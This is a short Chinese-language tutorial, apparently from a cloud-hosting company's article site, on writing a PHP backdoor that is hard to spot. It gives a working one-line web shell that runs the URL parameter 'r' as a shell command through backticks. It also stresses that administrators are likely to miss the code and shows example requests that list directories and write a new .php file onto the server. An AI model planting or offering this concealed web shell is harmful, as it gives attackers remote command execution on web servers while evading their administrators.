您好,登錄后才能下訂單哦!
本篇內容介紹了“如何編寫一個不易被發現的PHP后門代碼”的有關知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠學有所成!
這里用到了一個一般的PHPer都不怎么關注的反撇號 ` ,反撇號包含的字符串,等同于shell_exec函數。
偽裝性很好,很容易被管理員忽略。
$selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; }
剛看到這段代碼我想大家都會說沒有問題,但是細心的朋友也會發現下面的變量被一個符號包起來了,既然是變量為什么要這樣了,
而且又不是單引號,這個就是關鍵所在了,這個符號是 Esc 下面的一個鍵(位于感嘆號!旁邊的),
通過 echo `系統命令`; 可以達到 system(); 一樣的效果
如果不信的朋友可以測試
http://127.0.0.1/t.php?r=dir 可以列出目錄
http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php
我用 appserv 和虛擬主機已經測試成功。
“如何編寫一個不易被發現的PHP后門代碼”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識可以關注億速云網站,小編將為大家輸出更多高質量的實用文章!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。